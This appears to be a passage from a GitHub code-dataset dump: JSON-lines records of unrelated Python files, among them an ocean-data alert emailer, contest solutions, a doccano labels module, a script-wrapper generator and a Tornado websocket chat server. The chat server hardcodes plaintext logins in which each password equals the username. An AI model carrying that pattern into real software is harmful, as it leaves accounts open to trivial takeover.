    '\n f = param_difference_resumed.to_html()\n text = text + str(f) + '

    '\n\n\n\n\n\n if stream_difference_new.empty and data_but_annotated.empty and stream_difference_resumed.empty and param_difference_new.empty and param_difference_resumed.empty:\n pass\n else: \n text = text + '

    Summary of New and Ongoing Issues

    '\n # text = text + '
    ' + '

    '\n\n if no_data_not_annotated.empty:\n pass\n else:\n text = text + 'Instruments and streams not producing data for over 24 hours:

    '\n f = no_data_not_annotated.to_html()\n text = text + str(f) + '

    '\n\n if annotated_and_not_operational.empty:\n pass\n else:\n text = text + 'Instruments and streams not producing data and annotated as not_operational:

    '\n f = annotated_and_not_operational.to_html()\n text = text + str(f) + '

    '\n\n if param_final_out.empty:\n pass\n else:\n text = text + 'Parameters not producing data within global ranges for over 24 hours:

    '\n f = param_final_out.to_html()\n text = text + str(f) + '

    ' \n\n\n # if missing_gr_qc_values.empty:\n # pass\n # else:\n # text = text + 'Parameter instances missing global range qc values:

    '\n # text = text + 'Values need to be entered here: https://github.com/ooi-integration/qc-lookup/blob/master/data_qc_global_range_values.csv

    '\n # f = missing_gr_qc_values.to_html()\n # text = text + str(f) + '

    '\n\n # if missing_science_classification.empty:\n # pass\n # else:\n # text = text + 'Parameter instances with QC values but not classified as science parameters: but that have global range qc values

    '\n # text = text + 'Classification needs to be made in preload as \"Science Data\" under column dataproducttype: https://github.com/oceanobservatories/preload-database/blob/master/csv/ParameterDefs.csv

    '\n # text = text + 'If the parameter does not exist in preload, then the parameter needs to be removed from the QC tables https://github.com/ooi-integration/qc-lookup/blob/master/data_qc_global_range_values.csv

    '\n # f = missing_science_classification.to_html()\n # text = text + str(f) + '

    '\n\n\n\n subject = 'Data Quality and Availability Alert for ' + array + ' on ' + datetime.datetime.utcnow().strftime('%Y-%m-%d')\n text = print_html_doc(html_template,text)\n\n msg = MIMEText(text,'html')\n msg['Subject'] = subject\n\n if array == 'RS':\n recipients = RS_recipients\n sendEmail(msg,recipients)\n elif array == 'CE':\n recipients = CE_recipients\n sendEmail(msg,recipients)\n elif array == 'GA':\n recipients = GA_recipients\n sendEmail(msg,recipients)\n elif array == 'GI':\n recipients = GA_recipients\n sendEmail(msg,recipients)\n elif array == 'GP':\n recipients = GA_recipients\n sendEmail(msg,recipients)\n elif array == 'GS':\n recipients = GA_recipients\n sendEmail(msg,recipients)\n elif array == 'CP':\n recipients = CP_recipients\n sendEmail(msg,recipients)\n","repo_name":"friedrichknuth/ooi_stats","sub_path":"alerts/data_alerts_functions.py","file_name":"data_alerts_functions.py","file_ext":"py","file_size_in_byte":36398,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"8734805816","text":"#problem 1417 / reformat the string\nclass Solution(object):\n def reformat(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n num = []\n let = []\n for ss in s:\n if 48<=ord(ss)<=57:\n num.append(ss)\n else:\n let.append(ss)\n if abs(len(num)-len(let)) > 1:\n return ''\n res = ''\n if len(num) > len(let):\n res += num.pop()\n while num or let:\n if let:\n res += let.pop()\n if num:\n res += num.pop()\n return res","repo_name":"digitalladder/leetcode","sub_path":"problem1417.py","file_name":"problem1417.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1183994648","text":"#The purpose of this script is to display a hierachy like view of folders, subfolders and files that they contain\n#Updated version of FL01\n\nimport glob\nimport pandas as pd\nimport re\n\ndef create_list(directory,inventory,sheetname):\n\n\n #This is a list comprehension where you are outputing the results in the for loop directly in the list\n files = [f for f in glob.glob(directory + '/**', recursive=True)]\n\n #Creating a dataframe from list files\n df=pd.DataFrame(files)\n\n\n\n #Count no of '\\' in each row and add values to new column called backslash count\n df['Backslash count']= df[0].str.count(r'\\\\',re.I)\n\n #Calculate max value in backslash count\n no_of_cols= df['Backslash count'].max()-1\n\n #CREATING NEW DATAFRAME\n #Spliting the string using \\ as seperator\n df2= df[0].str.split('\\\\',n=no_of_cols,expand=True)\n\n #Creating column header list\n\n col_header= ['level '+str(i) for i in range(no_of_cols+1)]\n #print(col_header)\n\n #Renaming columns of df2\n df2.columns=col_header\n\n #EXPORTING DATAFRAME TO EXCEL ( OVERRIDES EXISTING FILE EVERYTIME)\n #from pandas import ExcelWriter\n #writer=ExcelWriter('File Inventory.xlsx')\n #df2.to_excel(writer,'Other Learning File List',index=False)\n #writer.save()\n\n #EXPORTING DATA TO EXISTING EXCEL FILE\n from openpyxl import load_workbook\n\n #Loading the File Management Excel File\n #path='File Management Phase 1.xlsx'\n book=load_workbook(inventory)\n\n #Accessing pandas excel writer\n writer=pd.ExcelWriter(inventory,engine='openpyxl')\n writer.book = book\n\n #Final Step - Writing the dataframe to the Excel file loaded above\n df2.to_excel(writer,sheet_name=sheetname,index=False)\n\n #Saving and close the file\n writer.save()\n writer.close()\n\ncreate_list(r'C:\\Users\\user\\Documents\\4.Other Learning','File Management Phase 1.xlsx','Other Learning Folder')\n","repo_name":"fabricerjsjoseph/File-Location-Lookup","sub_path":"FL02-File Inventory Generator.py","file_name":"FL02-File Inventory Generator.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5765731856","text":"def rec(m,n):\n if m<0 or n<0:\n return 0\n elif m==0 or n==0:\n return 1\n else:\n return 1+rec(min(m,n)+1,max(m,n)-2)\nm,n=map(int,input().split())\ntemp=m\nm=min(m,n)\nif m!=temp:\n n=temp\nprint(rec(min(m,n)+1,max(m,n)-2))\n#FIRST RECURSIVE SOLUTION EVER DEVELOPED BY ME\n\n","repo_name":"sreyansb/Codeforces","sub_path":"codeforces651Ajoysticks.py","file_name":"codeforces651Ajoysticks.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37591210534","text":"# **************************************************************************\n# *\n# * Authors: Josue Gomez Blanco (jgomez@cnb.csic.es)\n# *\n# * Unidad de Bioinformatica of Centro Nacional de Biotecnologia , CSIC\n# *\n# * This program is free software; you can redistribute it and/or modify\n# * it under the terms of the GNU General Public License as published by\n# * the Free Software Foundation; either version 2 of the License, or\n# * (at your option) any later version.\n# *\n# * This program is distributed in the hope that it will be useful,\n# * but WITHOUT ANY WARRANTY; without even the implied warranty of\n# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# * GNU General Public License for more details.\n# *\n# * You should have received a copy of the GNU General Public License\n# * along with this program; if not, write to the Free Software\n# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA\n# * 02111-1307 USA\n# *\n# * All comments concerning this program package may be sent to the\n# * e-mail address 'scipion@cnb.csic.es'\n# *\n# **************************************************************************\n\"\"\"\nThis modules contains constants related to Brandeis packages protocols\n\"\"\"\n\n#------------------ Constants values --------------------------------------\n\n#Modes of search/refinement/reconstruction\nMOD_RECONSTRUCTION = 0\nMOD_REFINEMENT = 1\nMOD_RANDOM_SEARCH_REFINEMENT = 2\nMOD_SIMPLE_SEARCH_REFINEMENT = 3\nMOD_SEARCH_REFINE_RANDOMISE = 4\n\n#Modes for the first iteration\nMOD2_SIMPLE_SEARCH_REFINEMENT = 0\nMOD2_SEARCH_REFINE_RANDOMISE = 1\n\n\n# Methods to correct the Ewald sphere\nEWA_DISABLE = 0\nEWA_SIMPLE = 1\nEWA_REFERENCE = 2\nEWA_SIMPLE_HAND = 3\nEWA_REFERENCE_HAND = 4\n\n# FSC calculation\nFSC_CALC = 0\nFSC_3DR_ODD = 1\nFSC_3DR_EVEN = 2\nFSC_3DR_ALL = 3\n\n# Memory Usage\nMEM_0 = 0\nMEM_1 = 1\nMEM_2 = 2\nMEM_3 = 3\n\n# Interpolation\nINTERPOLATION_0 = 0\nINTERPOLATION_1 = 1\n\n# Parameters to Refine\nREF_ALL = 0\nREF_ANGLES = 1\nREF_SHIFTS = 2\nREF_NONE = 3\n","repo_name":"I2PC/scipion-web","sub_path":"pyworkflow/em/packages/grigoriefflab/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"73744775273","text":" #!/usr/bin/env python2.7\n\"\"\"\nJack dywer\n18 march 2012\n\"\"\"\nimport sys\nimport time\nfrom threading import Thread\nfrom Worker import Worker\n\nsys.path.append(\"../Core\")\nimport zmq\nfrom CommonLib import AverageList\nfrom CommonLib import Logger\nfrom CommonLib import DatFile\n\n\n\n\n\nclass WorkerBufferAverage(Worker):\n \n def eh(self):\n self.name = \"WorkerBufferAverage\" #For logging\n Logger.log(self.name, \"Generated\")\n\n self.allIntensities = []\n self.aveIntensities = []\n self.ave = AverageList.AverageList()\n \n self.user = \"\"\n self.experiment = \"\"\n \n \n def run(self, datFile):\n self.allIntensities.append(datFile.intensities)\n self.aveIntensities = self.ave.average(self.allIntensities)\n Logger.log(self.name, \"Average Buffer Generated\")\n \n def getAve(self):\n return self.aveIntensities\n \n def clear(self):\n \"\"\"Clear out function for when a new experiment is starting\"\"\"\n self.allIntensities = []\n self.aveIntensities = []\n Logger.log(self.name, \"Worker Cleared - all buffers forgotten\")\n \n def updateRecords(self, user, experiment):\n self.user = user\n self.experiment = experiment\n \n \n \n\ndef send_buffer_data(context, worker):\n bufferReply = context.socket(zmq.REP)\n bufferReply.bind(\"tcp://127.0.0.1:7883\")\n \n try:\n while True:\n req = bufferReply.recv() #wait for request of buffer\n bufferReply.send_pyobj(worker.aveIntensities)\n except KeyboardInterrupt:\n pass\n\n\nif __name__ == \"__main__\":\n worker = WorkerBufferAverage()\n \n if len(sys.argv) > 1 and sys.argv[1] == \"tests\":\n d = DatFile.DatFile(\"Sim/data/0p009_0166.dat\")\n worker.run(d)\n \n else:\n context = zmq.Context()\n\n buffers = context.socket(zmq.PULL)\n buffers.connect(\"tcp://127.0.0.1:7881\")\n \n junk = Thread(target=send_buffer_data, args=(context, worker))\n junk.start()\n try:\n while True:\n #filter out what to do\n filter = buffers.recv()\n if (str(filter) == \"datFile\"):\n datFile = buffers.recv_pyobj()\n worker.run(datFile)\n \n if (str(filter) == 'user'):\n user = buffers.recv()\n experiment = buffers.recv()\n worker.updateRecords(user, experiment)\n\n if (str(filter) == 'recalculate_buffer'):\n worker.clear()\n \n if (str(filter) == 'clear'):\n worker.clear() \n \n \n \n \n\n \n except KeyboardInterrupt:\n pass\n","repo_name":"jackdwyer/SAXS-Auto-Processor","sub_path":"deprecated/WorkerBufferAverage.py","file_name":"WorkerBufferAverage.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15141500719","text":"# coding:utf-8\r\n\r\nimport sys\r\n\r\n\r\ninput = sys.stdin.readline\r\n\r\n\r\ndef inpl(): return list(map(int, input().split()))\r\n\r\n\r\nH, W, N = inpl()\r\nL = [W] * H\r\n\r\n# ?x??????x??????????????\r\nfor i in range(N):\r\n x, y = inpl()\r\n x -= 1\r\n y -= 1\r\n L[x] = min(L[x], y)\r\n\r\nk = 0 # y??????????\r\nfor x in range(1, H):\r\n if L[x] <= k:\r\n print(x)\r\n break\r\n if L[x] != k + 1:\r\n k += 1\r\nelse:\r\n print(H)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/agc029/D/3805001.py","file_name":"3805001.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"35123670938","text":"class OrgUnit:\n\n def __init__(self, mv_sdk, base_url: str, domain: str, **kwargs: dict):\n \"\"\"\n Initialize the OrgUnit Domain\n \"\"\"\n super()\n self.mv_sdk = mv_sdk\n self.base_url = base_url\n self.domain = domain\n\n def get_current(self, params=None, data=None, headers=None, auth=None, object_id=None,\n object_action='current', domain_id=None, domain_action=None):\n \"\"\"\n https://docs.mediavalet.com/#7bbaf6aa-9e15-44ef-bc66-493fa680baf5\n \"\"\"\n headers = headers or {}\n headers['Content-Type'] = 'application/x-www-form-urlencoded'\n\n return self.mv_sdk.request(\n 'get',\n self.base_url,\n self.domain,\n params=params,\n data=data,\n headers=headers,\n auth=auth,\n object_id=object_id,\n object_action=object_action,\n domain_id=domain_id,\n domain_action=domain_action\n )\n","repo_name":"armstro-ca/mvsdk","sub_path":"src/mvsdk/rest/org_unit/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73957059754","text":"import abc\nfrom typing import List, Type\n\nfrom auto_labeling_pipeline.labels import Labels\nfrom django.contrib.auth.models import User\n\nfrom examples.models import Example\nfrom label_types.models import CategoryType, LabelType, SpanType\nfrom labels.models import Category, Label, Span, TextLabel\nfrom projects.models import Project\n\n\nclass LabelCollection(abc.ABC):\n label_type: Type[LabelType]\n model: Type[Label]\n\n def __init__(self, labels):\n self.labels = labels\n\n def transform(self, project: Project, example: Example, user: User) -> List[Label]:\n mapping = {c.text: c for c in self.label_type.objects.filter(project=project)}\n annotations = []\n for label in self.labels:\n if label[\"label\"] not in mapping:\n continue\n label[\"example\"] = example\n label[\"label\"] = mapping[label[\"label\"]]\n label[\"user\"] = user\n annotations.append(self.model(**label))\n return annotations\n\n def save(self, project: Project, example: Example, user: User):\n labels = self.transform(project, example, user)\n labels = self.model.objects.filter_annotatable_labels(labels, project)\n self.model.objects.bulk_create(labels)\n\n\nclass Categories(LabelCollection):\n label_type = CategoryType\n model = Category\n\n\nclass Spans(LabelCollection):\n label_type = SpanType\n model = Span\n\n\nclass Texts(LabelCollection):\n model = TextLabel\n\n def transform(self, project: Project, example: Example, user: User) -> List[Label]:\n annotations = []\n for label in self.labels:\n label[\"example\"] = example\n label[\"user\"] = user\n annotations.append(self.model(**label))\n return annotations\n\n\ndef create_labels(task_type: str, labels: Labels) -> LabelCollection:\n return {\"Category\": Categories, \"Span\": Spans, \"Text\": Texts}[task_type](labels.dict())\n","repo_name":"doccano/doccano","sub_path":"backend/auto_labeling/pipeline/labels.py","file_name":"labels.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":8483,"dataset":"github-code","pt":"72"} +{"seq_id":"28039467165","text":"# ----------------------------------------------------------------------\r\n# |\r\n# | ScriptsActivationActivity.py\r\n# |\r\n# | David Brownell \r\n# | 2018-05-06 23:07:10\r\n# |\r\n# ----------------------------------------------------------------------\r\n# |\r\n# | Copyright David Brownell 2018-22.\r\n# | Distributed under the Boost Software License, Version 1.0.\r\n# | (See accompanying file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)\r\n# |\r\n# ----------------------------------------------------------------------\r\n\"\"\"Contains the ScriptsActivationActivity object.\"\"\"\r\n\r\nimport os\r\nimport textwrap\r\n\r\nfrom collections import OrderedDict, namedtuple\r\n\r\nimport inflect as inflect_mod\r\nimport six\r\n\r\nfrom RepositoryBootstrap import Constants\r\nfrom RepositoryBootstrap.Impl import CommonEnvironmentImports\r\nfrom RepositoryBootstrap.Impl.ActivationActivity import ActivationActivity\r\n\r\n# ----------------------------------------------------------------------\r\n_script_fullpath = CommonEnvironmentImports.CommonEnvironment.ThisFullpath()\r\n_script_dir, _script_name = os.path.split(_script_fullpath)\r\n# ----------------------------------------------------------------------\r\n\r\ninflect = inflect_mod.engine()\r\n\r\n# ----------------------------------------------------------------------\r\nIGNORE_AS_TOOL_DIR_FILENAME = \"IgnoreAsTool\"\r\n\r\n# ----------------------------------------------------------------------\r\n@CommonEnvironmentImports.Interface.staticderived\r\nclass ScriptsActivationActivity(ActivationActivity):\r\n\r\n # ----------------------------------------------------------------------\r\n # |\r\n # | Public Properties\r\n # |\r\n # ----------------------------------------------------------------------\r\n Name = CommonEnvironmentImports.Interface.DerivedProperty(\"Scripts\")\r\n DelayExecute = CommonEnvironmentImports.Interface.DerivedProperty(False)\r\n\r\n # ----------------------------------------------------------------------\r\n # |\r\n # | Private Methods\r\n # |\r\n # ----------------------------------------------------------------------\r\n @classmethod\r\n @CommonEnvironmentImports.Interface.override\r\n def _CreateCommandsImpl( cls,\r\n output_stream,\r\n verbose_stream,\r\n configuration,\r\n repositories,\r\n version_specs,\r\n generated_dir,\r\n no_display_conflicts,\r\n ):\r\n # ----------------------------------------------------------------------\r\n ExtractorInfo = namedtuple( \"ExtractorInfo\",\r\n [ \"Repository\",\r\n \"CreateCommandsFunc\",\r\n \"CreateDocumentationFunc\",\r\n \"ScriptNameDecoratorFunc\",\r\n ],\r\n )\r\n\r\n DirGeneratorResult = namedtuple( \"DirGeneratorResult\",\r\n [ \"Dir\",\r\n \"Recurse\",\r\n ],\r\n )\r\n\r\n ScriptInfo = namedtuple( \"ScriptInfo\",\r\n [ \"Repo\",\r\n \"Extractor\",\r\n \"Filename\",\r\n ],\r\n )\r\n\r\n WrappedItem = namedtuple( \"WrappedItem\",\r\n [ \"Name\",\r\n \"DisplayName\",\r\n \"Desc\",\r\n \"ScriptInfo\",\r\n ],\r\n )\r\n\r\n # ----------------------------------------------------------------------\r\n\r\n dest_dir = os.path.join(generated_dir, cls.Name)\r\n\r\n verbose_stream.write(\"Cleaning previous content...\")\r\n with verbose_stream.DoneManager():\r\n CommonEnvironmentImports.FileSystem.RemoveTree(dest_dir)\r\n\r\n CommonEnvironmentImports.FileSystem.MakeDirs(dest_dir)\r\n\r\n # As a convenience, generate links without file extensions that\r\n # point to the file extension version on some systems.\r\n generate_extensionless_links = (\r\n CommonEnvironmentImports.CurrentShell.CategoryName == \"Linux\"\r\n and CommonEnvironmentImports.CurrentShell.ScriptExtension\r\n )\r\n\r\n # Scripts can come in a variety of different forms and customization methods\r\n # may return new ways to traverse a directory. Maintain a list of all potential\r\n # dir generators to use when parsing script directories.\r\n dir_generators = [ lambda dir, version_specs: os.path.join(dir, cls.Name),\r\n ]\r\n\r\n extractors = OrderedDict()\r\n\r\n verbose_stream.write(\"Preparing dynamic functionality...\")\r\n with verbose_stream.DoneManager( done_suffixes=[ lambda: \"{} found\".format(inflect.no(\"extractor\", len(extractors))),\r\n lambda: \"{} found\".format(inflect.no(\"generator\", len(dir_generators))),\r\n ],\r\n ):\r\n args = { \"repositories\" : repositories,\r\n \"version_specs\" : version_specs,\r\n }\r\n\r\n for repository in repositories:\r\n result = cls.CallCustomMethod( os.path.join(repository.Root, Constants.ACTIVATE_ENVIRONMENT_CUSTOMIZATION_FILENAME),\r\n Constants.ACTIVATE_ENVIRONMENT_CUSTOM_SCRIPT_EXTRACTOR_METHOD_NAME,\r\n args,\r\n as_list=False,\r\n )\r\n if result is None:\r\n continue\r\n\r\n # The result can be:\r\n #\r\n # ( ExtractorMap, DirGenerators )\r\n # ( ExtractorMap, DirGenerator )\r\n # ExtractorMap\r\n\r\n if isinstance(result, tuple):\r\n these_extractors, these_generators = result\r\n\r\n if not isinstance(these_generators, list):\r\n these_generators = [ these_generators, ]\r\n\r\n dir_generators += these_generators\r\n else:\r\n these_extractors = result\r\n\r\n for k, v in six.iteritems(these_extractors):\r\n if k in extractors:\r\n raise Exception(textwrap.dedent(\r\n \"\"\"\\\r\n A wrapper for '{ext}' was already defined.\r\n\r\n New: {new_name} <{new_id}> [{new_root}]\r\n Original: {original_name} <{original_id}> [{original_root}]\r\n \"\"\").format( ext=k,\r\n new_name=repository.Name,\r\n new_id=repository.Id,\r\n new_root=repository.Root,\r\n original_name=extractors[k].Repository.Name,\r\n original_id=extractors[k].Repository.Id,\r\n original_root=extractors[k].Repository.Root,\r\n ))\r\n\r\n # Extract values can be:\r\n #\r\n # ( CreateCommands, CreateDocumentation, ScriptNameDecorator )\r\n # ( CreateCommands, CreateDocumentation )\r\n # ( CreateCommands )\r\n # CreateCommands\r\n\r\n if not isinstance(v, tuple):\r\n v = ( v, )\r\n\r\n extractors[k] = ExtractorInfo( repository,\r\n v[0],\r\n v[1] if len(v) > 1 else lambda x: '',\r\n v[2] if len(v) > 2 else lambda filename: os.path.splitext(os.path.basename(filename))[0],\r\n )\r\n\r\n # Get the scrpts\r\n if extractors:\r\n script_infos = []\r\n\r\n verbose_stream.write(\"Searching for content...\")\r\n with verbose_stream.DoneManager( done_suffix=lambda: \"{} found\".format(inflect.no(\"script\", len(script_infos))),\r\n ):\r\n\r\n for repository in repositories:\r\n for dir_generator in dir_generators:\r\n # Generator values can be:\r\n #\r\n # [ (str, recurse), ... ]\r\n # [ str, ... ]\r\n # (str, recurse)\r\n # str\r\n\r\n results = dir_generator(repository.Root, version_specs)\r\n if results is None:\r\n continue\r\n\r\n if not isinstance(results, list):\r\n results = [ results, ]\r\n\r\n for result in results:\r\n if isinstance(result, six.string_types):\r\n result = DirGeneratorResult(result, True)\r\n else:\r\n result = DirGeneratorResult(result[0], result[1])\r\n\r\n if not os.path.isdir(result.Dir):\r\n continue\r\n\r\n if result.Recurse:\r\n # ----------------------------------------------------------------------\r\n def GenerateFilenames():\r\n for item in CommonEnvironmentImports.FileSystem.WalkFiles( result.Dir,\r\n traverse_exclude_dir_names=[ lambda name: name.lower().endswith(\"impl\"),\r\n ],\r\n exclude_file_base_names=[ lambda name: name.lower().endswith(\"plugin\"),\r\n ],\r\n ):\r\n yield item\r\n\r\n # ----------------------------------------------------------------------\r\n else:\r\n # ----------------------------------------------------------------------\r\n def GenerateFilenames():\r\n for item in os.listdir(result.Dir):\r\n fullpath = os.path.join(result.Dir, item)\r\n\r\n if os.path.isfile(fullpath):\r\n yield fullpath\r\n\r\n # ----------------------------------------------------------------------\r\n\r\n for script_filename in GenerateFilenames():\r\n ext = os.path.splitext(script_filename)[1]\r\n\r\n extractor = extractors.get(ext, None)\r\n if extractor is None:\r\n continue\r\n\r\n script_infos.append(ScriptInfo( repository,\r\n extractor,\r\n script_filename,\r\n ))\r\n\r\n if script_infos:\r\n wrappers = OrderedDict()\r\n\r\n verbose_stream.write(\"Creating script wrappers...\")\r\n with verbose_stream.DoneManager( done_suffix=lambda: \"{} written\".format(inflect.no(\"wrapper\", len(wrappers))),\r\n ) as dm:\r\n # We have a list of script files and the functions used to extract information\r\n # from them. Files were extracted based on repositories ordered from the lowest\r\n # to highest level. However, it is likely that the user will want to use scripts\r\n # from high-level repositories more often than lower-level ones when names collide.\r\n # Reverse the order of the higher-level scripts get the standard name while conflicts\r\n # in lower-level libraries are renamed.\r\n script_infos.reverse()\r\n\r\n for script_info in script_infos:\r\n these_commands = script_info.Extractor.CreateCommandsFunc(script_info.Filename)\r\n if these_commands is None:\r\n continue\r\n\r\n # Create an unique name for the wrapper\r\n base_name = script_info.Extractor.ScriptNameDecoratorFunc(script_info.Filename)\r\n\r\n conflicts = []\r\n\r\n while True:\r\n potential_filename = os.path.join(dest_dir, \"{}{}{}\".format( base_name,\r\n len(conflicts) + 1 if conflicts else '',\r\n CommonEnvironmentImports.CurrentShell.ScriptExtension,\r\n ))\r\n\r\n if potential_filename in wrappers:\r\n conflicts.append(wrappers[potential_filename])\r\n else:\r\n break\r\n\r\n base_name = os.path.splitext(os.path.basename(potential_filename))[0]\r\n\r\n if conflicts and no_display_conflicts:\r\n dm.stream.write(textwrap.dedent(\r\n \"\"\"\\\r\n The wrapper script for '{original_name}' has been renamed '{new_name}' to avoid naming conflicts with:\r\n {conflicts}\r\n \"\"\").format( original_name=script_info.Filename,\r\n new_name=base_name,\r\n conflicts='\\n'.join([ \" - {}\".format(wrapped_item.ScriptInfo.Filename) for wrapped_item in conflicts ]),\r\n ))\r\n\r\n with open(potential_filename, 'w') as f:\r\n f.write(CommonEnvironmentImports.CurrentShell.GenerateCommands(these_commands))\r\n\r\n CommonEnvironmentImports.CurrentShell.MakeFileExecutable(potential_filename)\r\n\r\n assert script_info.Filename.startswith(script_info.Repo.Root), (script_info.Filename, script_info.Repo.Root)\r\n display_location = script_info.Filename[len(script_info.Repo.Root):].lstrip(os.path.sep)\r\n\r\n assert display_location.startswith(Constants.SCRIPTS_SUBDIR), display_location\r\n display_location = display_location[len(Constants.SCRIPTS_SUBDIR):].lstrip(os.path.sep)\r\n\r\n wrappers[potential_filename] = WrappedItem( base_name,\r\n display_location,\r\n script_info.Extractor.CreateDocumentationFunc(script_info.Filename),\r\n script_info,\r\n )\r\n\r\n if generate_extensionless_links:\r\n extensionless_link = os.path.splitext(potential_filename)[0]\r\n\r\n CommonEnvironmentImports.CurrentShell.CreateSymLink(\r\n extensionless_link,\r\n potential_filename,\r\n )\r\n CommonEnvironmentImports.CurrentShell.MakeFileExecutable(extensionless_link)\r\n\r\n if wrappers:\r\n verbose_stream.write(\"Creating '{}'...\".format(Constants.SCRIPT_LIST_NAME))\r\n with verbose_stream.DoneManager():\r\n these_commands = [ CommonEnvironmentImports.CurrentShell.Commands.EchoOff(),\r\n CommonEnvironmentImports.CurrentShell.Commands.Message(\"\\nAvailable scripts are:\\n\"),\r\n ]\r\n\r\n prev_repo = None\r\n\r\n # Above, we reversed the items so we could order from most-specific to least-specific. Here,\r\n # we want to order from least-specific to most specific.\r\n wrapper_infos = list(six.itervalues(wrappers))\r\n wrapper_infos.reverse()\r\n\r\n for wrapper_info in wrapper_infos:\r\n if wrapper_info.ScriptInfo.Repo != prev_repo:\r\n header = \"{name:<70} {location:>80}\".format( name=\"{} <{}>\".format(wrapper_info.ScriptInfo.Repo.Name, wrapper_info.ScriptInfo.Repo.Id),\r\n location=wrapper_info.ScriptInfo.Repo.Root,\r\n )\r\n\r\n these_commands.append(CommonEnvironmentImports.CurrentShell.Commands.Message(textwrap.dedent(\r\n \"\"\"\\\r\n {sep}\r\n {header}\r\n {sep}\r\n \"\"\").format( header=header,\r\n sep='=' * len(header),\r\n )))\r\n\r\n prev_repo = wrapper_info.ScriptInfo.Repo\r\n\r\n content = \"{0:<68} {1:>78}\".format(CommonEnvironmentImports.CurrentShell.CreateScriptName(wrapper_info.Name, filename_only=True), wrapper_info.DisplayName)\r\n content += \"\\n{}\\n\".format('-' * len(content))\r\n\r\n if wrapper_info.Desc:\r\n content += \"{}\\n\".format(CommonEnvironmentImports.StringHelpers.LeftJustify(wrapper_info.Desc, 2, skip_first_line=False))\r\n\r\n these_commands.append(CommonEnvironmentImports.CurrentShell.Commands.Message(CommonEnvironmentImports.StringHelpers.LeftJustify(content, 4, skip_first_line=False)))\r\n\r\n filename = os.path.join(dest_dir, CommonEnvironmentImports.CurrentShell.CreateScriptName(Constants.SCRIPT_LIST_NAME, filename_only=True))\r\n\r\n with open(filename, 'w') as f:\r\n f.write(CommonEnvironmentImports.CurrentShell.GenerateCommands(these_commands))\r\n\r\n CommonEnvironmentImports.CurrentShell.MakeFileExecutable(filename)\r\n\r\n # Write output\r\n lines = textwrap.dedent(\r\n # pylint: disable = C0330\r\n \"\"\"\\\r\n Shell wrappers have been created for all the recognized files contained within the directory\r\n '{script_dir}' across all repositories. For a complete list of these wrappers, run:\r\n\r\n {script_name}\r\n \"\"\").format( script_dir=cls.Name,\r\n script_name=os.path.basename(filename),\r\n ).rstrip().split('\\n')\r\n\r\n max_length = max(*[ len(line) for line in lines ])\r\n centered_template = \"| {{:^{}}} |\".format(max_length)\r\n\r\n output_stream.write(textwrap.dedent(\r\n \"\"\"\\\r\n\r\n {line}\r\n | {whitespace} |\r\n {content}\r\n | {whitespace} |\r\n {line}\r\n\r\n \"\"\").format( line='-' * (max_length + 6),\r\n whitespace=' ' * max_length,\r\n content='\\n'.join([ centered_template.format(line) for line in lines ]),\r\n ))\r\n\r\n return [\r\n CommonEnvironmentImports.CurrentShell.Commands.AugmentPath(dest_dir),\r\n ]\r\n","repo_name":"davidbrownell/Common_Environment_v3","sub_path":"RepositoryBootstrap/Impl/ActivationActivity/ScriptsActivationActivity.py","file_name":"ScriptsActivationActivity.py","file_ext":"py","file_size_in_byte":22083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7397426677","text":"#-*- encoding:utf-8 -*-\nimport tornado.web, tornado.websocket\nimport tornado.httpserver\nimport tornado.ioloop\nimport os\nimport json\nfrom tornado.options import define, options\n\nvalid_user_dict = {'weichao': 'weichao',\n 'chenchen6': 'chenchen6',\n 'xuzongpeng': 'xuzongpeng',\n 'liuwentong1': 'liuwentong1',\n 'jiaou': 'jiaou',\n 'chenjun': 'chenjun',\n 'panglijun': 'panglijun',\n 'yangke1': 'yangke1',\n 'liuyuqin': 'liuyuqin',\n 'longcangjian1': 'longcangjian1'}\ndefine(\"port\", default=9000, help=\"run on the given port\", type=int)\n\nclass SocketHandler(tornado.websocket.WebSocketHandler):\n clients = {}\n client_id_to_num_map = {}\n\n def open(self):\n self.write_message({'type': 'sys', 'msg': 'hello, Welcome to WebSocket'})\n #有新人加入时进行广播通知\n client_id = id(self)\n SocketHandler.clients[client_id] = self\n\n\n @staticmethod\n def send_to_all(message):\n for c in SocketHandler.clients:\n c.write_message(message)\n\n def on_close(self):\n uid = id(self)\n u_number = SocketHandler.client_id_to_num_map[uid]\n if uid in SocketHandler.client_id_to_num_map:\n del SocketHandler.client_id_to_num_map[uid]\n if uid in SocketHandler.clients:\n del SocketHandler.clients[uid]\n for friend_client_id in SocketHandler.clients.keys():\n SocketHandler.send_broadcast_msg(u_number, friend_client_id, 'offline')\n\n def update_client(self, client_id, client_number):\n for k, v in SocketHandler.client_id_to_num_map.items():\n if v == client_number:\n del SocketHandler.client_id_to_num_map[k]\n SocketHandler.client_id_to_num_map[client_id] = client_number\n\n @staticmethod\n def send_broadcast_msg(from_client_number, to_client_id, msg_type):\n msg_object = {'type': msg_type, 'from_client_number': from_client_number}\n if 